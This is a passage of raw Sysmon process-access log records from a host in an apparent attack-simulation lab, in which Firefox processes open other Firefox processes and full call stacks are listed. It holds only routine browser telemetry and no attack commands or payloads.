Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+2bacb60|C:\Program Files\Mozilla Firefox\xul.dll+afe305|C:\Program Files\Mozilla Firefox\xul.dll+afe596|C:\Program Files\Mozilla Firefox\xul.dll+afbcde|C:\Program Files\Mozilla Firefox\xul.dll+afbf10|C:\Program Files\Mozilla Firefox\xul.dll+29b54bf|C:\Program Files\Mozilla Firefox\xul.dll+29b52a8|C:\Program Files\Mozilla Firefox\xul.dll+29b902e|C:\Program Files\Mozilla Firefox\xul.dll+29be3b4|C:\Program Files\Mozilla Firefox\xul.dll+29b23ae|C:\Program Files\Mozilla Firefox\xul.dll+29c1123|C:\Program Files\Mozilla Firefox\xul.dll+29c8ae2|C:\Program Files\Mozilla Firefox\xul.dll+ec4bb7|C:\Program Files\Mozilla Firefox\xul.dll+e1e321|C:\Program Files\Mozilla Firefox\xul.dll+348add|C:\Program Files\Mozilla Firefox\xul.dll+ecf5e7|C:\Program Files\Mozilla Firefox\xul.dll+e4a21b 10341000x800000000000000017322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+2bacb60|C:\Program Files\Mozilla Firefox\xul.dll+afe305|C:\Program Files\Mozilla Firefox\xul.dll+afe596|C:\Program Files\Mozilla Firefox\xul.dll+afbcde|C:\Program Files\Mozilla Firefox\xul.dll+afbf10|C:\Program Files\Mozilla Firefox\xul.dll+29b54bf|C:\Program Files\Mozilla Firefox\xul.dll+29b52a8|C:\Program Files\Mozilla Firefox\xul.dll+29b902e|C:\Program Files\Mozilla Firefox\xul.dll+29be3b4|C:\Program Files\Mozilla Firefox\xul.dll+29b23ae|C:\Program Files\Mozilla Firefox\xul.dll+29c1123|C:\Program Files\Mozilla Firefox\xul.dll+29c8ae2|C:\Program Files\Mozilla Firefox\xul.dll+ec4bb7|C:\Program Files\Mozilla Firefox\xul.dll+e1e321|C:\Program Files\Mozilla Firefox\xul.dll+348add|C:\Program Files\Mozilla Firefox\xul.dll+ecf5e7|C:\Program Files\Mozilla Firefox\xul.dll+e4a21b 10341000x800000000000000017321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+2bacb60|C:\Program Files\Mozilla Firefox\xul.dll+afe305|C:\Program Files\Mozilla Firefox\xul.dll+afe596|C:\Program Files\Mozilla Firefox\xul.dll+afbcde|C:\Program Files\Mozilla Firefox\xul.dll+afbf10|C:\Program Files\Mozilla Firefox\xul.dll+29b54bf|C:\Program Files\Mozilla Firefox\xul.dll+29b52a8|C:\Program Files\Mozilla Firefox\xul.dll+29b902e|C:\Program Files\Mozilla Firefox\xul.dll+29be3b4|C:\Program Files\Mozilla Firefox\xul.dll+29b23ae|C:\Program Files\Mozilla Firefox\xul.dll+29c1123|C:\Program Files\Mozilla Firefox\xul.dll+29c8ae2|C:\Program Files\Mozilla Firefox\xul.dll+ec4bb7|C:\Program Files\Mozilla Firefox\xul.dll+e1e321|C:\Program Files\Mozilla Firefox\xul.dll+348add|C:\Program Files\Mozilla Firefox\xul.dll+ecf5e7|C:\Program Files\Mozilla Firefox\xul.dll+e4a21b 10341000x800000000000000017320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.786{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+2bacb60|C:\Program Files\Mozilla Firefox\xul.dll+afe305|C:\Program Files\Mozilla Firefox\xul.dll+afe596|C:\Program Files\Mozilla Firefox\xul.dll+afbcde|C:\Program Files\Mozilla Firefox\xul.dll+afbf10|C:\Program Files\Mozilla Firefox\xul.dll+29b54bf|C:\Program Files\Mozilla Firefox\xul.dll+29b52a8|C:\Program Files\Mozilla Firefox\xul.dll+29b902e|C:\Program Files\Mozilla Firefox\xul.dll+29be3b4|C:\Program Files\Mozilla Firefox\xul.dll+29b23ae|C:\Program Files\Mozilla Firefox\xul.dll+29c1123|C:\Program Files\Mozilla Firefox\xul.dll+29c8ae2|C:\Program Files\Mozilla Firefox\xul.dll+ec4bb7|C:\Program Files\Mozilla Firefox\xul.dll+e1e321|C:\Program Files\Mozilla Firefox\xul.dll+348add|C:\Program Files\Mozilla Firefox\xul.dll+ecf5e7|C:\Program Files\Mozilla Firefox\xul.dll+e4a21b 10341000x800000000000000017319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.645{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.645{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.645{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.645{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.629{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.598{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 